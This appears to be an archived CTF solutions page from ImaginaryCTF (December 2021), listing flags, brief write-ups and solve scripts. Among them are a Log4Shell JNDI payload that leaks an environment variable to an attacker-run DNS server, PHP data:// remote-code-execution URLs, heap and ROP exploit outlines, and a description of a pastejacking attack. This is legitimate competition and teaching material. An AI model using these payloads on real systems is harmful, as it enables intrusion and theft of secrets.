Archived Challenges - December 2021

ictf{very_original_challenge_welcome_to_round_17}

ictf{very_original_challenge_welcome_to_round_17}

ictf{very_original_challenge_welcome_to_round_17_for_real_this_time}

ictf{very_original_challenge_welcome_to_round_17_for_real_this_time}

You can get all the data, remove all the control characters, and get every 20th character to get most of the flag. You can then add on the end of the flag.

from pwn import *
from re import *

p = remote("137.184.207.224", 1337)

text = ''.join(chr(i) for i in p.recvall())
text = re.sub('\x1b\\[[0-9]+G ?', '', text)
print(text[:-220:20] + text[-209:-189])```

ictf{oh_boy_this_is_gonna_be_a_long_flag_you_aint_ready_for_this_I'm_gonna_make_Eth's_flags_look_like_lttle_babies_compared_to_this_one_did_you_know_that_the_max_flag_length_is_1_megabyte?_not_1_million_bytes_but_1024*1024_bytes_I_bet_you're_thinking_now_if_I_used_that_whole_length_the_answer_is_no_but_this_flag_does_go_on_for_some_time_gonna_throw_in_some_special_characters_!@#$^%&&*()_and_some_letters_tooo_abcdefghijklnmopqrstuvwxyzABCDEFGHJIKLMNOPQRSTUVWXYZ_maybe_some_numbers_for_good_measure?_123456789086753091337_and_maybe_thats_enough?_has_to_be_a_long_and_complicated_flag_if_I'm_just_gonna_print_it_for_you_dont_want_you_jsut_remembering_it_now_if_you're_new_to_this_I_recommend_looking_up_pwntools_it's_a_python_library_that's_super_useful_in_interacting_with_netcat_servers_like_this_please_don't_try_to_write_this_down_from_memory_and_now_for_the_end_of_the_flag_I'm_gonna_have_to_put_at_least_160_characters_of_garbage_so_this_actually_isn't_memorable_cheers!_ZG9uJ3QgbWluZCBtZSBqdXN0ICdyYW5kb21seScgZ2VuZXJhdGluZyBzb21lIGp1bmsgaGVyZS4gaWYgeW91IHdlcmUgbG9va2luZyBmb3IgYW4gZWFzdGVyIGVnZywgdGhlcmUgaXNuJ3Qgb25lIGluIHRoaXMgY2hhbGxlbmdlLCBidXQgSSBkbyBwbGFuIG9uIHB1dHRpbmcgc29tZSBpbiBmdXR1cmUgY2hhbGxlbmdlcy4gSSdsbCAocHJvYmFibHkpIGFubm91bmNlIGlmL3doZW4gdGhhdCBoYXBwZW5zIHRobw==}

Listen to the server/port you give to the remote, and after about 6 connections, you should have all the chars in the flag.

from pwn import *

flag = [32]

my_ip = "puzzler7.imaginaryctf.org"
remote_ip = "137.184.207.224"
recvport = 9999

conns = 0

while 32 in flag:
    conns += 1
    recv = listen(recvport)
    p = remote(remote_ip, 1111)
    p.sendline(my_ip)
    p.sendline(str(recvport))
    newflag = recv.recvall()
    if len(newflag) > len(flag):
        flag = [i for i in newflag]
        continue
    for i in range(len(newflag)):
        if newflag[i] != 32:
            flag[i] = newflag[i]
    print(bytes(flag))
print(f"solved in {conns} connections")```

ictf{r3vers3_sh3ll_ch3ck_passed!_gr3@t_w0r|<_6a6c2154b067a874}

https://imaginaryctf.org/f/cqxmL

ictf{vigenere_ciphers_are_very_very_very_cool_but_what_you_should_really_know_is_to_not_deserialize_user_input}

${jndi:ldap://test.${env:FLAG}.[YOUR_SERVER]}

Enter the above and check the DNS queries at the server. I used interact.sh, but there's many other possible solutions (probably including getting RCE)

ictf{couldnt_figure_an_ldap_server_so_here_we_are}

There's probably a few ways to do this - I haven't written up a proper solution script.

That said, because you know the length of the flag, you can convert probabilities back into the number of times each character was used. A single use of i, c, t, f, {, and } can be removed from the pool. Because { can only lead to a t, the first letter is t. The number of _ is the number of words - 1, and the letters that can come after an underscore are the first letters of the words. Following these will give you on osca, which could be googled to get Oscar Wilde.

Following these deductions should lead to The Ballad of Reading Gaol.

ictf{the_ballad_of_reading_gaol_by_oscar_wilde}

Reverse the bits

from Crypto.Util.number import *
b = open("how_is_this_reversing.bin", "rb").read()
print(long_to_bytes(int(bin(bytes_to_long(b))[2:].zfill(8*len(b))[::-1], 2)))

ictf{t@k!ng_rever$ing_t0O_lit3raLly}

https://imaginaryctf.org/f/8fKhl

ictf{crypt0_1s_usel3ss_wh3n_y0ur_k3ys_4r3_3xp0s3d}

https://imaginaryctf.org/f/9NHK8

ictf{what_hath_i_done_308b2394}

https://imaginaryctf.org/f/EGb1z

ictf{gCd_15_7h3_r3@l_mvP!}

Find IV given the key, because CBC xors plaintext with IV. We can assume that IV is b'\x00' * 16, so that we get the xor'd plaintext. Then, we can find the IV, and submit that to our Mersenne Twister cracker. At the end, we can predict the key for the flag. One can determine the flag's IV as well, but I didn't "corrupt" it there because it'd be funny. (Solve script: https://imaginaryctf.org/f/8kshz)

ictf{find_iv_with_key_and_find_number_with_MT!}

After some reverse engineering of the pyc file (through e.g. uncompyle6), we are faced with an ECC signature. This turns out to be a Schnorr signature over the secp256k1 curve.

Since Schnorr signatures are known to be broken if the random nonce is reused with the same key (and different messages), we might try to target this. Analysing the code some more, we find that the string formatting that happens to seed the randomness actually discards most of the precision from the time measurement: time is a floating point value in seconds, and "%d" formats it as an integer. This means that two nonces generated within the same second will be the same. When developing an exploit, we can easily verify this by testing if the value for t is identical between both signatures. Now we only need to find two different messages that we can get signed. Unfortunately, the code checks our input against a single whitelisted option. Except that's not quite what happens: our messages is first stripped before that check, but the unstripped message is the one being signed. This means we can sign one regular message, and one message with added whitespace in the front or the back.

We can then recover the private key in the classical way, sign the server's challenge, and obtain the flag.

(Solve script: https://imaginaryctf.org/f/QGNwl)

ictf{strip_me_of_my_nonce_reuse_pl34se}

https://imaginaryctf.org/f/bl63b

ictf{r00_r3ally_mus7_b3_bl1nd}

Find the admin token by reversing the auth function, then make the value of the cookie TOKEN the admin token.

ictf{why_d1d_y0u_st3al_r00's_c00k13s?}

Use directory traversal to read flag.txt

ictf{3asy_r3ad1ng_r1gh7?_336864}

http://chal.imaginaryctf.org:42069/loadPage.php?filename=data://text/plain,%3C?php%20echo%20`ls%20/usr/share/`%20?%3E

http://chal.imaginaryctf.org:42069/loadPage.php?filename=data://text/plain,%3C?php%20echo%20`cat%20/usr/share/2DDE6A75E455C20D91AF50B290900F2F.txt`%20?%3E

ictf{ugggggggggggggggghhhhhhhhhhhhhhhhhh_firepwwwwwwwwwwwnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyy}

curl https://fake.ictf.iciaran.com/ --header "Host: real.ictf.iciaran.com"

ictf{who_needs_dns_anyway}

Follow the instructions

ictf{n0w_y0u_c4n_h34p!!!}

Because integers are asymmetrical, -1 * -INT_MAX = -INT_MAX. When the negative value is converted into a size_t in fread, you read way too much data, and from there it's a standard buffer overflow challenge.

Solve script here (https://imaginaryctf.org/f/01FUJ#x.py), just a standard ROP - leak libc, call system('/bin/sh').

ictf{presents_are_square_but_signed_integers_are_asymmetrical}

The cake is a lie. One byte overflow. Allocate a few chunks, overflow the size of a chunk, free that chunk, get it back with more room to write data. You now have overlapping chunks.

https://imaginaryctf.org/f/OtZvO

ictf{3v3n_a_on3_byt3_ov3rflow_can_b3_3xploit3d_d18e4f19}

https://thebittheories.com/the-curious-case-of-binary-search-the-famous-bug-that-remained-undetected-for-20-years-973e89fc212

There's a buffer overflow bug in the binary search, as it performs mid = (low+high)/2. As all of these are signed shorts, this can cause an overflow when low and high are sufficiently large enough. You can then use this to leak memory outside of the bounds of the array. There may be an elegant way to do this, but I simply brute forced characters around the beginning of the flag until I had the entire flag. See solve script here: https://imaginaryctf.org/f/rGN3R#x.py

ictf{b1n5e@r(h3xf!1}

Reverse the bytecode, e.g. using the reference at https://docs.python.org/3/library/dis.html#python-bytecode-instructions. This results in the following script: https://imaginaryctf.org/f/VSb79. Inserting the provided secret b"sSSss" and printing flag at the end reveals the flag.

ictf{do_y0u_sSSssp34k_p4rssSSs3lT0ngu3?}

This is a pastejacking attack - the JS prepends some commands when the code is copied. These commands make a hidden folder in /tmp, adds the folder to PATH, and downloads a file to this hidden folder. Because it's at the beginning of PATH, running flagchecker will run that file, rather than the file that appears to be curled in the command (which is just https://github.com/keroserene/rickrollrc).

The secret flagchecker file is a standard flagchecker - it uses a Lagged Fibonacci Generator to generate some random numbers, which it xors with the flag. Generating the same numbers and xoring with the array in the binary will give the flag.

ictf{be_careful_when_copy_pasting_code_from_the_internet!}